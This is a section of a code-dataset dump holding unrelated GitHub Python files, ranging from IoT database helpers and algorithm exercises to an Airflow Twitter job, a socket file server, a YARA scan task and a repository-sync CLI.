def get_user(self, user_id):\n return self._user_collection.find_one({'_id': user_id })\n\n def set_last_values(self, user_id, device_id, temp, hum, soil, gas, aqi, rssi):\n self._user_collection.update_one({'_id': user_id, 'devices.id': device_id }, \n { \"$set\": { \n \"devices.$.lastTempValue\": float(temp),\n \"devices.$.lastHumidityValue\": float(hum),\n \"devices.$.lastGasValue\": float(gas),\n \"devices.$.lastSoilValue\": float(soil),\n \"devices.$.lastAqiValue\": float(aqi),\n \"devices.$.lastRssiValue\": float(rssi)\n } })\n\n def set_lastseen_device(self, user_id, device_id):\n epoch_time = int(time.time())\n self._user_collection.update_one({'_id': user_id, 'devices.id': device_id }, { \"$set\": { \"devices.$.lastSeen\": epoch_time } })\n\n def set_device_values(self, user_id, device_id, json):\n self._user_collection.update_one({\n '_id': user_id, \n 'devices.id': device_id \n }, { \n \"$set\": {\n \"devices.$.host\": json.get(\"host\", \"\"),\n \"devices.$.wifiSsid\": json.get(\"wifiSsid\", \"\"),\n \"devices.$.totalMqttPacketCount\": json.get(\"totalMqttPacketCount\", 0),\n \"devices.$.receivedMqttPacketCount\": json.get(\"receivedMqttPacketCount\", 0),\n \"devices.$.totalHttpPacketCount\": json.get(\"totalHttpPacketCount\", 0),\n \"devices.$.receivedHttpPacketCount\": json.get(\"receivedHttpPacketCount\", 0),\n \"devices.$.mqttMeanTime\": json.get(\"mqttMeanTime\", 0),\n \"devices.$.httpMeanTime\": json.get(\"httpMeanTime\", 0)\n }\n })\n","repo_name":"Vallasc/Low-energy-Outdoor-Monitoring","sub_path":"src/proxy/src/mongo_client.py","file_name":"mongo_client.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"33799339758","text":"# Mirror of a binary tree\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution: # traversal\n def Mirror(self , pRoot: TreeNode) -> TreeNode:\n self.traverse(pRoot)\n return pRoot\n\n def traverse(self, node):\n if not node:\n return\n \n self.traverse(node.left)\n self.traverse(node.right)\n node.left, node.right = node.right, node.left\n\nclass Solution: # recursion\n def Mirror(self , pRoot: TreeNode) -> TreeNode:\n # Definition: flip the binary tree rooted at pRoot, return the root of the flipped tree\n if not pRoot:\n return\n \n left = self.Mirror(pRoot.left)\n right = self.Mirror(pRoot.right)\n pRoot.left, pRoot.right = right, left\n return pRoot\n","repo_name":"wenshuojie/Algorithm-progress","sub_path":"剑指101/BM33.py","file_name":"BM33.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40491061829","text":"import sys\nimport yaml\nimport transaction\nfrom argparse import ArgumentParser\nfrom gettext import translation\nfrom pyramid.paster import get_app\nfrom sqlalchemy import func\n\n\ndef main():\n parser = ArgumentParser(\n prog=sys.argv[0], add_help=True,\n description=\"Tool to fill the tsearch table (Full-Text Search) \"\n \"from the theme information.\",\n )\n\n parser.add_argument(\n \"--interfaces\",\n nargs='+',\n required=True,\n help=\"the interfaces to export\",\n )\n parser.add_argument(\n \"--duplicate-name\",\n action=\"store_true\",\n dest=\"name\",\n help=\"allows to add a name more than one time,\\n\"\n \"by default if we find more than one element with the same name \"\n \"only one will be imported\",\n )\n parser.add_argument(\n \"--no-themes\",\n action=\"store_false\",\n dest=\"themes\",\n 
help=\"don't import the themes\",\n )\n parser.add_argument(\n \"--no-blocks\",\n action=\"store_false\",\n dest=\"blocks\",\n help=\"don't import the blocks (first level layer groups)\",\n )\n parser.add_argument(\n \"--no-folders\",\n action=\"store_false\",\n dest=\"folders\",\n help=\"don't import the folders (tree folders)\",\n )\n parser.add_argument(\n \"--no-layers\",\n action=\"store_false\",\n dest=\"layers\",\n help=\"don't import the layers (tree leaf)\",\n )\n parser.add_argument(\n \"--package\",\n help=\"the application package\",\n )\n parser.add_argument(\n \"-i\", \"--app-config\",\n default=\"production.ini\",\n dest=\"app_config\",\n help=\"the application .ini config file (optional, default is 'production.ini')\"\n )\n parser.add_argument(\n \"-n\", \"--app-name\",\n default=\"app\",\n dest=\"app_name\",\n help=\"the application name (optional, default is 'app')\"\n )\n options = parser.parse_args()\n\n app_config = options.app_config\n app_name = options.app_name\n if app_name is None and \"#\" in app_config:\n app_config, app_name = app_config.split(\"#\", 1)\n get_app(app_config, name=app_name)\n\n Import(options)\n\n\nclass Import:\n def __init__(self, options):\n self.options = options\n self.imported = set()\n\n settings = {}\n with open(\".build/config.yaml\") as f:\n settings = yaml.load(f)\n\n self.fts_languages = settings[\"fulltextsearch\"][\"languages\"]\n self.languages = settings[\"available_locale_names\"]\n\n # must be done only once we have loaded the project config\n from c2cgeoportal.models import DBSession, FullTextSearch, Interface, Theme, Role\n\n self.session = DBSession()\n self.session.execute(FullTextSearch.__table__.delete().where(FullTextSearch.from_theme == True)) # noqa\n\n self._ = {}\n for lang in self.languages:\n self._[lang] = translation(\"demo-server\", \"demo/locale/\", [lang])\n\n self.interfaces = self.session.query(Interface).filter(\n Interface.name.in_(options.interfaces)\n ).all()\n\n self.public_theme = {}\n self.public_group = {}\n for interface in self.interfaces:\n self.public_theme[interface.id] = []\n self.public_group[interface.id] = []\n\n for theme in self.session.query(Theme).filter_by(public=True).all():\n self._add_theme(theme)\n\n for role in self.session.query(Role).all():\n for theme in self.session.query(Theme).all():\n self._add_theme(theme, role)\n\n transaction.commit()\n\n def _add_fts(self, item, interface, action, role):\n from c2cgeoportal.models import FullTextSearch\n\n key = (\n item.name if self.options.name else item.id,\n interface.id,\n role.id if role is not None else None\n )\n if key not in self.imported:\n self.imported.add(key)\n for lang in self.languages:\n fts = FullTextSearch()\n fts.label = self._[lang].gettext(item.name)\n fts.role = role\n fts.interface = interface\n fts.lang = lang\n fts.public = role is None\n fts.ts = func.to_tsvector(self.fts_languages[lang], fts.label)\n fts.actions = [{\n \"action\": action,\n \"data\": item.name,\n }]\n fts.from_theme = True\n self.session.add(fts)\n\n def _add_theme(self, theme, role=None):\n fill = False\n for interface in self.interfaces:\n if interface in theme.interfaces:\n for child in theme.children:\n fill = self._add_block(child, interface, role) or fill\n\n if fill and self.options.themes:\n if role is None:\n self.public_theme[interface.id].append(theme.id)\n\n if role is None or theme.id not in self.public_theme[interface.id]:\n self._add_fts(theme, interface, \"add_theme\", role)\n\n def _add_block(self, group, interface, role):\n 
return self._add_group(group, interface, self.options.blocks, role)\n\n def _add_folder(self, group, interface, role):\n return self._add_group(group, interface, self.options.folders, role)\n\n def _add_group(self, group, interface, export, role):\n from c2cgeoportal.models import LayerGroup\n\n fill = False\n for child in group.children:\n if isinstance(child, LayerGroup):\n fill = self._add_folder(child, interface, role) or fill\n else:\n fill = self._add_layer(child, interface, role) or fill\n\n if fill and export:\n if role is None:\n self.public_group[interface.id].append(group.id)\n\n if role is None or group.id not in self.public_group[interface.id]:\n self._add_fts(group, interface, \"add_group\", role)\n\n return fill\n\n def _layer_visible(self, layer, role):\n for restrictionarea in layer.restrictionareas:\n if role in restrictionarea.roles:\n return True\n return False\n\n def _add_layer(self, layer, interface, role):\n from c2cgeoportal.models import LayerV1\n\n if isinstance(layer, LayerV1):\n return False\n\n if role is None:\n fill = layer.public and interface in layer.interfaces\n else:\n fill = interface in layer.interfaces and not layer.public and \\\n self._layer_visible(layer, role)\n\n if fill and self.options.layers:\n self._add_fts(layer, interface, \"add_layer\", role)\n\n return fill\n","repo_name":"craxxkid/c2cgeoportal","sub_path":"c2cgeoportal/scripts/theme2fts.py","file_name":"theme2fts.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"386080483","text":"import os\n\n\ndef readInput(filename: str):\n\n script_location = os.path.dirname(os.path.realpath(__file__))\n input_file_path = os.path.join(script_location, filename)\n\n with open(input_file_path, 'r') as f:\n coordinates = [*enumerate(int(i) for i in f)]\n return coordinates\n\n\ndef mix(coordinates, times=1):\n numbers = list(coordinates)\n numbers_length = len(coordinates)\n\n for _ in range(times):\n for coordinate in coordinates:\n idx = numbers.index(coordinate)\n item = numbers.pop(idx)\n new_idx = (idx + item[1]) % len(numbers)\n numbers.insert(new_idx, item)\n\n for zero_idx, coordinate in enumerate(numbers):\n _, val = coordinate\n if val == 0:\n break\n\n result = numbers[(zero_idx + 1000) % numbers_length][1]\n result += numbers[(zero_idx + 2000) % numbers_length][1]\n result += numbers[(zero_idx + 3000) % numbers_length][1]\n\n return result\n\n\ndef part1(inputFile: str):\n coordinates = readInput(inputFile)\n return mix(coordinates)\n\n\ndef part2(inputFile: str):\n coordinates = readInput(inputFile)\n decryption_key = 811589153\n coordinates = [(idx, val * decryption_key) for idx, val in coordinates]\n return mix(coordinates, times=10)\n\n\ndef test():\n print('---- TEST ----')\n filename = 'test_input.txt'\n\n assert part1(filename) == 3\n print('Part 1 OK')\n\n assert part2(filename) == 1623178306\n print('Part 2 OK')\n\n\ndef main():\n print('\\n---- MAIN ----')\n filename = 'input.txt'\n\n solution_part1 = part1(filename)\n print(f'Solution for Part 1: {solution_part1}')\n assert solution_part1 == 3346\n\n solution_part2 = part2(filename)\n print(f'Solution for Part 2: {solution_part2}\\n')\n assert solution_part2 == 4265712588168\n\n\nif __name__ == '__main__':\n test()\n 
main()\n","repo_name":"siimveske/AOC","sub_path":"2022/day20/day_20_grove_positioning_system.py","file_name":"day_20_grove_positioning_system.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73575295799","text":"\"\"\"\nCode that goes along with the Airflow tutorial located at:\nhttps://github.com/apache/incubator-airflow/blob/master/airflow/example_dags/tutorial.py\n\"\"\"\nfrom airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.python_operator import PythonOperator, BranchPythonOperator\nfrom datetime import datetime, timedelta\n\n\nargs = {\n 'owner': 'yen',\n 'depends_on_past': False,\n 'start_date': datetime.now()\n}\n\n#dag = DAG('etl_app_V3', default_args=args)\n\n\n\n# -----------------------------------\n# job func \n\nfrom twython import Twython\nimport time\nimport os \n\ntry:\n APP_KEY = os.environ['APP_KEY']\n APP_SECRET = os.environ['APP_SECRET'] \nexcept:\n print (' No API key , please set up via : ')\n print (' https://developer.twitter.com/en/apps')\n\ndef main():\n twitter = Twython(APP_KEY, APP_SECRET, oauth_version=2)\n ACCESS_TOKEN = twitter.obtain_access_token()\n print (ACCESS_TOKEN) \n ACCESS_TOKEN = ACCESS_TOKEN\n twitter = Twython(APP_KEY, access_token=ACCESS_TOKEN)\n twitter.get_application_rate_limit_status()['resources']['search']\n #RETRIEVING REAL TIME STREAMING TWEETS ABOUT BLOCKCHAIN \n search = twitter.search(q=\"blockchain\", count=2000)\n tweets = search['statuses']\n #for tweet in tweets:\n #print (tweet['id_str'], '\\n', tweet['text'], tweet['favorite_count'], tweet['retweet_count'] ), '\\n\\n\\n'\n ids = []\n #for tweet in tweets:\n #ids.append(tweet['id_str'])\n ids = [tweet['id_str'] for tweet in tweets]\n texts = [tweet['text'] for tweet in tweets]\n times = [tweet['retweet_count'] for tweet in tweets]\n favtimes = [tweet['favorite_count'] for tweet in tweets]\n follower_count = [tweet['user']['followers_count'] for tweet in tweets]\n location = [tweet['user']['location'] for tweet in tweets]\n lang = [tweet['lang'] for tweet in tweets]\n print (tweets[0])\n return tweets\n\n# -----------------------------------\n\n\n\n\nwith DAG('etl_job_V2', default_args=args) as dag:\n superman_task = PythonOperator(\n task_id='main',\n python_callable=main\n )\n\n\n\n","repo_name":"yennanliu/twitter_real_time_pipeline","sub_path":"archive/etl_job_V2.py","file_name":"etl_job_V2.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9907378460","text":"\"\"\" Program to printout names of parties and their vote counts\r\nMazwi Myeza\r\n21 April 2014\r\nAssignment6\r\nQuestion3\r\n\"\"\"\r\n#Creating arrays and printing heading\r\nvotes = []\r\nparties = []\r\npartyVotes = []\r\nprint(\"Independent Electoral Commission\")\r\nprint(\"--------------------------------\")\r\n#Asking user for input and storing it in the created array\r\nvote = input(\"Enter the names of parties (terminated by DONE):\\n\")\r\ncounter = 0\r\nwhile vote != 'DONE':\r\n votes.append(vote)\r\n counter += 1\r\n vote = input()\r\n#sorting votes \r\nvotes.sort() \r\n#populating an array for the parties voted for\r\nfor i in range(counter):\r\n if votes[i] in parties:\r\n None\r\n else:\r\n parties.append(votes[i])\r\n#populating an array for the number of votes a party has recieved\r\ncount = 0 \r\nfor j in range(len(parties)):\r\n count = 
votes.count(parties[j])\r\n partyVotes.append(count)\r\nprint() \r\nprint(\"Vote counts:\")\r\n#printing results in the proper format\r\nfor k in range(len(parties)):\r\n f = \"{0:<11}\".format(parties[k])\r\n print(f, partyVotes[k], sep =\"- \")","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/myzmaz001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9082247860","text":"import pygame\nimport numpy as np\nimport random as rand\nfrom Source import UI_functions as UI\nfrom Source import battleships_functions_play as play\n\ndef Play_Game(screen, bg, Bmap1, Bmap2, cfg):\n \n #Init\n font_s = pygame.font.Font(\"Assets/Font/impact.ttf\", 26)\n font = pygame.font.Font(\"Assets/Font/impact.ttf\", 40)\n grid = pygame.image.load(\"Assets/Images/WhiteGrid.png\")\n square = pygame.image.load(\"Assets/Images/Square.png\")\n screen, bg = UI.Update_Screen_Values(screen, bg)\n pygame.time.Clock().tick(cfg[\"Basic\"].getint(\"FPS\"))\n\n #Initial Values\n CLICK = False\n RUNNING = True\n play.load_config_file(cfg)\n rect_map = UI.Rect_Player_AI_Map()\n rects, images_pos, text_pos = UI.Rect_Play()\n choose = rand.randint(0,1)\n texts = [font.render(cfg[\"Text\"][\"AI1\"], True, (255, 255, 255)), \n font.render(cfg[\"Text\"][\"AI2\"], True, (255, 255, 255)),\n font.render(cfg[\"Text\"][\"SCORE\"], True, (255, 255, 255)),\n font.render(str(cfg[\"Points\"].getint(\"AI1_PTS\")) + \" - \" + str(cfg[\"Points\"].getint(\"AI2_PTS\")), True, (255, 255, 255)),\n font_s.render(\"χ\", True, (52, 52, 54))]\n images = [square]\n \n AI1 = play.PlayBot(Bmap1, cfg[\"Basic\"].getint(\"ALG2\"))\n AI2 = play.PlayBot(Bmap2, cfg[\"Basic\"].getint(\"ALG1\"))\n shoot = True\n \n #InGame\n while RUNNING:\n \n #Screen properties per update\n mx, my = pygame.mouse.get_pos()\n screen.blit(bg,(0,0))\n\n #Draw functions \n UI.Draw_Left_Map_Play(screen, Bmap1, grid)\n UI.Draw_Right_Map_Play(screen, Bmap2, grid)\n UI.Draw_Pos(screen, images, images_pos)\n UI.Draw_Pos(screen, texts, text_pos)\n \n #Clickable buttons \n if rects[0].collidepoint((mx,my)) and CLICK:\n return True\n \n if shoot and choose in [0,2]:\n choose = 2\n AI1.AI_shot()\n if (1 in AI1.Map) == False:\n cfg.set(\"Points\",\"AI2_PTS\",str(cfg[\"Points\"].getint(\"AI2_PTS\") + 1))\n texts[3] = font.render(str(cfg[\"Points\"].getint(\"AI1_PTS\")) + \" - \" + str(cfg[\"Points\"].getint(\"AI2_PTS\")), True, (255, 255, 255))\n shoot = False\n \n if shoot and choose in [1,2]:\n choose = 2\n AI2.AI_shot()\n if (1 in AI2.Map) == False:\n cfg.set(\"Points\",\"AI1_PTS\",str(cfg[\"Points\"].getint(\"AI1_PTS\") + 1))\n texts[3] = font.render(str(cfg[\"Points\"].getint(\"AI1_PTS\")) + \" - \" + str(cfg[\"Points\"].getint(\"AI2_PTS\")), True, (255, 255, 255))\n shoot = False\n \n #Events and update\n pygame.display.update()\n\n CLICK = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n RUNNING = False\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n CLICK = True\n return cfg, False","repo_name":"Dorthion/Python-Minigames","sub_path":"Battleships/Source/Play_ai_ai_game.py","file_name":"Play_ai_ai_game.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73557040760","text":"from socket import *\r\nfrom threading import *\r\nimport sys\r\nimport 
string\r\nimport keyboard\r\nimport os\r\nimport glob\r\n\r\n\r\ndef listen(tecla): \r\n while True:\r\n keyboard.wait(tecla)\r\n print (\"Server terminated\")\r\n sys.exit()\r\n \r\n\r\n \r\n\r\nthreads = [Thread(target=listen, kwargs={\"tecla\":chr(27)})]\r\nfor thread in threads:\r\n thread.start()\r\n \r\n \r\n\r\n\r\nhost = 'localhost'\r\nport = 8080\r\nmysocket = socket(AF_INET,SOCK_STREAM)\r\nmysocket.bind((host,port))\r\nmysocket.listen(5)\r\nmy_dir = \"D:\\\\Estudos\\\\Sistemas Distribuidos\\\\Projeto Server-Client\\\\\"\r\n\r\n\r\n\r\nwhile True:\r\n print(\"Server started, waiting for connection.\")\r\n print(\"Press the 'ESC' key to exit.\")\r\n\r\n conexao, endereco = mysocket.accept()\r\n print('Server connected by', endereco)\r\n \r\n data = conexao.recv(1024)\r\n print(\"Data received \", data.decode())\r\n if data.decode() == \"-list\":\r\n os.chdir(my_dir)\r\n for file in glob.glob(\"*.*\"):\r\n size_file = os.path.getsize(file)\r\n msg_send = file + \" \"+str(size_file)\r\n print(\"\",end=\" \")\r\n conexao.send(str.encode(msg_send))\r\n else:\r\n file_search = data.decode()\r\n arq = open(file_search, 'rb')\r\n size = os.path.getsize(file_search)\r\n try:\r\n conexao.send(str.encode(str(size))) \r\n for i in arq.readlines():\r\n conexao.send(i)\r\n except:\r\n print(\"Error establishing communication with the client!\")\r\n arq.close()\r\n conexao.close()\r\n \r\n print(\"Connection finished\")\r\n print(\"Waiting for new connection\")\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"lucashca/SOCKET_SERVER-PY","sub_path":"Other/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37059253981","text":"from typing import List, Optional\n\nfrom app import schemas\nfrom app.services.scanners import YaraScanner\n\n\nasync def yara_scan_task(\n ctx_: dict, payload: schemas.YaraScanWithSearchOptions\n) -> schemas.JobResultWrapper:\n scan_results: Optional[List[schemas.YaraScanResult]] = None\n try:\n yara_scanner = YaraScanner(payload.source)\n scan_results = await yara_scanner.scan_snapshots(\n payload.target, payload.filters, size=payload.size, offset=payload.offset\n )\n except Exception as e:\n return schemas.JobResultWrapper(result=scan_results, error=str(e))\n\n return schemas.JobResultWrapper(result=scan_results, error=None)\n","repo_name":"ninoseki/uzen","sub_path":"app/arq/tasks/yara.py","file_name":"yara.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"40"} +{"seq_id":"20439051320","text":"import numpy as np\nimport os\nfrom pathlib import Path\nimport copy\nimport inspect\n\n\ndef get_args(func):\n\tsignature = inspect.signature(func)\n\treturn [k for k, v in signature.parameters.items()]\n\n\ndef get_default_args(func):\n\tsignature = inspect.signature(func)\n\treturn {\n\t\tk: v.default\n\t\tfor k, v in signature.parameters.items()\n\t\tif v.default is not inspect.Parameter.empty\n\t}\n\n\ndef shallow_copy(obj):\n\treturn copy.copy(obj)\n\n\ndef deep_copy(obj):\n\treturn copy.deepcopy(obj)\n\n\ndef mkdir(path):\n\tPath(path).mkdir(parents=True, exist_ok=True)\n\n\ndef close_obj(obj):\n\tif hasattr(obj, 'close'):\n\t\tobj.close()\n\n\ndef random_sample(indices, batch_size):\n\tindices = np.asarray(np.random.permutation(indices))\n\tbatches = indices[:len(indices) // batch_size * batch_size].reshape(-1, batch_size)\n\tfor batch in 
batches:\n\t\tyield batch\n\tr = len(indices) % batch_size\n\tif r:\n\t\tyield indices[-r:]\n\n\ndef generate_tag(params):\n\tif 'tag' in params.keys():\n\t\treturn\n\tgame = params['game']\n\tparams.setdefault('run', 0)\n\trun = params['run']\n\tdel params['game']\n\tdel params['run']\n\tstr = ['%s_%s' % (k, v) for k, v in sorted(params.items())]\n\ttag = '%s-%s-run-%d' % (game, '-'.join(str), run)\n\tparams['tag'] = tag\n\tparams['game'] = game\n\tparams['run'] = run\n\n\ndef translate(pattern):\n\tgroups = pattern.split('.')\n\tpattern = ('\\.').join(groups)\n\treturn pattern\n\n\ndef split(a, n):\n\tk, m = divmod(len(a), n)\n\treturn (a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n))\n\n\ndef ensure_dir(d):\n\tif not os.path.exists(d):\n\t\tos.makedirs(d)\n\n\nclass RunningMeanStd(object):\n\t# https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm\n\tdef __init__(self, epsilon=1e-4, shape=()):\n\t\tself.mean = np.zeros(shape, 'float64')\n\t\tself.var = np.ones(shape, 'float64')\n\t\tself.count = epsilon\n\t\n\tdef update(self, x):\n\t\tbatch_mean = np.mean(x, axis=0)\n\t\tbatch_var = np.var(x, axis=0)\n\t\tbatch_count = x.shape[0]\n\t\tself.update_from_moments(batch_mean, batch_var, batch_count)\n\t\n\tdef update_from_moments(self, batch_mean, batch_var, batch_count):\n\t\tself.mean, self.var, self.count = update_mean_var_count_from_moments(\n\t\t\tself.mean, self.var, self.count, batch_mean, batch_var, batch_count)\n\n\ndef update_mean_var_count_from_moments(mean, var, count, batch_mean, batch_var, batch_count):\n\tdelta = batch_mean - mean\n\ttot_count = count + batch_count\n\t\n\tnew_mean = mean + delta * batch_count / tot_count\n\tm_a = var * count\n\tm_b = batch_var * batch_count\n\tM2 = m_a + m_b + np.square(delta) * count * batch_count / tot_count\n\tnew_var = M2 / tot_count\n\tnew_count = tot_count\n\t\n\treturn new_mean, new_var, new_count","repo_name":"chandar-lab/LoCA2","sub_path":"dyna-exp/core/utils/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"36988009328","text":"import numpy as np\r\nimport cv2\r\nfrom sklearn.cluster import KMeans\r\n\r\ndef get_palette(img_path, n_colors):\r\n # Loading the image and transform it\r\n img = cv2.imread(img_path)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGRA2RGB)\r\n\r\n # Flat the image\r\n flat_img = img.reshape((img.shape[0] * img.shape[1], 3))\r\n \r\n # Define and train the model\r\n clt = KMeans(n_colors)\r\n clt.fit(flat_img)\r\n\r\n # Get the colors\r\n colors = clt.cluster_centers_.astype(int).tolist()\r\n \r\n # Make an histogram\r\n n_bins = np.arange(0, clt.n_clusters + 1)\r\n data_hist = clt.labels_\r\n (hist, _) = np.histogram(data_hist, bins=n_bins)\r\n hist = hist.astype(float)\r\n \r\n # Normalize the data\r\n hist /= hist.sum()\r\n\r\n return colors, list(hist)\r\n","repo_name":"BubuDavid/Color-Palette_Picker","sub_path":"models/color_picker.py","file_name":"color_picker.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70764192761","text":"import json\n\nfrom resources.utility import generic_utility\n\n\nclass CacheMissException(Exception):\n def __init__(self, jsn):\n self.jsn = jsn\n\n\ndef req_path(*paths):\n from resources import connect\n\n auth_url = generic_utility.auth_url()\n endpoints = generic_utility.endpoints()\n\n if not 
auth_url or not endpoints:\n connect.do_login()\n\n post = '{\"paths\":['\n for curpath in paths:\n post += curpath+','\n post = post[:-1]\n post += '],\"authURL\":\"%s\"}' % auth_url\n\n content = connect.load_netflix_site(generic_utility.evaluator_url % (generic_utility.api_url, endpoints['/pathEvaluator']), post)\n jsn = json.loads(content)\n if 'error' in jsn:\n err = jsn['error']\n if 'innerErrors' in err:\n inners = err['innerErrors']\n for inner_err in inners:\n if 'message' in inner_err:\n msg = inner_err['message']\n if 'Map cache miss' == msg:\n raise CacheMissException(content)\n raise Exception('Invalid path response: ' + content)\n if 'value' not in jsn:\n raise Exception('Invalid path response: ' + content)\n\n return jsn['value']\n\ndef get_root_list_id_from_cookie():\n from resources import connect\n profile = generic_utility.get_setting('selected_profile')\n\n session = connect.get_netflix_session(False)\n\n root_list_id = None\n if not profile:\n generic_utility.log('no profile!')\n for cur_cookie in session.cookies:\n if 'lhpuuidh-browse-' in cur_cookie.name:\n# generic_utility.log('found cookie: '+cur_cookie.value)\n root_list_id = cur_cookie.value\n break\n elif 'lhpuuid-kid-' in cur_cookie.name:\n root_list_id = cur_cookie.value\n else:\n for cur_cookie in session.cookies:\n if 'lhpuuidh-browse-'+profile in cur_cookie.name:\n root_list_id = cur_cookie.value\n break\n elif 'lhpuuid-kid-'+profile in cur_cookie.name:\n root_list_id = cur_cookie.value\n\n if not root_list_id:\n raise ValueError('root_list_id not found in cookies!')\n\n splt = root_list_id.split('%3A')\n if(len(splt) != 3):\n raise ValueError('Invalid split: '+root_list_id)\n\n# generic_utility.log('root: '+str(splt[2]))\n return splt[2]\n\n\ndef from_to(fromnr, tonr):\n return '{\"from\":%d,\"to\":%d}' % (fromnr, tonr)\n\ndef path(type, *parms):\n retpath = '['+type+','\n for parm in parms:\n retpath += parm+','\n retpath = retpath[:-1]\n retpath += ']'\n return retpath\n\ndef filter_empty(jsn):\n for key in list(jsn.keys()):\n if type(jsn[key]) == dict and '$type' in jsn[key] and jsn[key]['$type'] == 'sentinel':\n del jsn[key]\n elif type(jsn[key]) == dict:\n filter_empty(jsn[key])\n\ndef child(chld, jsn):\n if not chld in jsn:\n raise ValueError(str(chld)+' not found in: '+str(jsn))\n return jsn[chld]\n\ndef deref(ref, jsn):\n val = jsn\n idx = None\n for layer in ref:\n if not layer in val:\n raise ValueError(str(layer)+' not found in: '+str(jsn))\n val = val[layer]\n idx = layer\n return idx, val\n","repo_name":"listamilton/supermilton.repository","sub_path":"plugin.video.supermiltonflix/resources/path_evaluator/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37187394755","text":"import logging\nimport os\nimport sys\n\nfrom cliff import app\nfrom cliff import command\nfrom cliff import commandmanager\n\nimport trsync\n\nfrom trsync.objects import rsync_mirror\nfrom trsync.objects import rsync_ops\nfrom trsync.objects import rsync_url\n\n\nclass PushCmd(command.Command):\n log = logging.getLogger(__name__)\n\n def get_description(self):\n return \"push SRC to several DST with snapshots\"\n\n def get_parser(self, prog_name):\n parser = super(PushCmd, self).get_parser(prog_name)\n parser.add_argument('source',\n help='Source rsync url (local, rsyncd, remote '\n 'shell). 
Mean that it is a directory, not a file.')\n parser.add_argument('-n', '--snapshot-name',\n default='',\n required=False,\n help='Snapshot name. Source url directory name by '\n 'default. Will contain the source/ '\n 'content on remote. Full snapshot name will be '\n '\"{snapshot-name}-{timestamp}\". Snapshot will be '\n 'placed in directory specified by '\n '\"--snapshots-dir\" option. Also '\n '\"{snapshot-name}-latest\" symlink will be updated '\n 'on successful sync (--latest-successful-postfix)')\n parser.add_argument('-d', '--dest',\n nargs='+',\n required=True,\n help='Destination rsync url(s)')\n parser.add_argument('-t', '--timestamp',\n required=False,\n help='Specified timestamp will be used for '\n 'snapshot. Will be generated automaticaly by '\n 'default. Format:yyyy-mm-dd-hhMMSS')\n parser.add_argument('--snapshots-dir', '--snapshot-dir',\n required=False,\n default='snapshots',\n help='Directory name for snapshots relative '\n '\"destination\". \"snapshots\" by default')\n parser.add_argument('--init-directory-structure',\n action='store_true',\n required=False,\n default=False,\n help='It specified, all directories including'\n '\"snapshots-dir\" will be created on remote '\n 'location. Disabled by default.')\n parser.add_argument('--snapshot-lifetime', '--save-latest-days',\n required=False,\n default=61,\n help='Snapshots for specified number of days will '\n 'be saved. All older will be removed. 61 by '\n 'default. 0 mean that old snapshots will not be '\n 'deleted, \"None\" mean that all snapshots '\n 'excluding latest will be deleted')\n parser.add_argument('--latest-successful-postfix',\n required=False,\n default='latest',\n help='Postfix for symlink to latest successfully '\n 'synced snapshot. Also used as --link-dest '\n 'target. \"latest\" by default.')\n parser.add_argument('-s', '--symlinks',\n nargs='+',\n required=False,\n default=[],\n help='Update additional symlinks relative '\n 'destination. Only \"latest\" by default.')\n parser.add_argument('--extra',\n required=False,\n default='',\n help='String with additional rsync parameters. '\n 'For example it may be \"\\--dry-run '\n '--any-rsync-option\".Use \"\\\\\" to disable '\n 'argparse to parse extra value.')\n\n return parser\n\n def take_action(self, parsed_args):\n properties = vars(parsed_args)\n source_url = properties.pop('source', None)\n snapshot_name = properties.pop('snapshot_name', '').strip(' /')\n symlinks = properties.pop('symlinks', None)\n servers = properties.pop('dest', None)\n if properties['extra'].startswith('\\\\'):\n properties['extra'] = properties['extra'][1:]\n properties['rsync_extra_params'] = properties.pop('extra')\n properties['snapshot_lifetime'] = \\\n None if properties['snapshot_lifetime'] == 'None' \\\n else int(properties['snapshot_lifetime'])\n\n source = rsync_ops.RsyncOps(source_url)\n source_url = source.url.url_dir()\n if not snapshot_name:\n snapshot_name = os.path.basename(source.url.path)\n if not snapshot_name:\n raise RuntimeError(\"Can't detect 'snapshot_name'. 
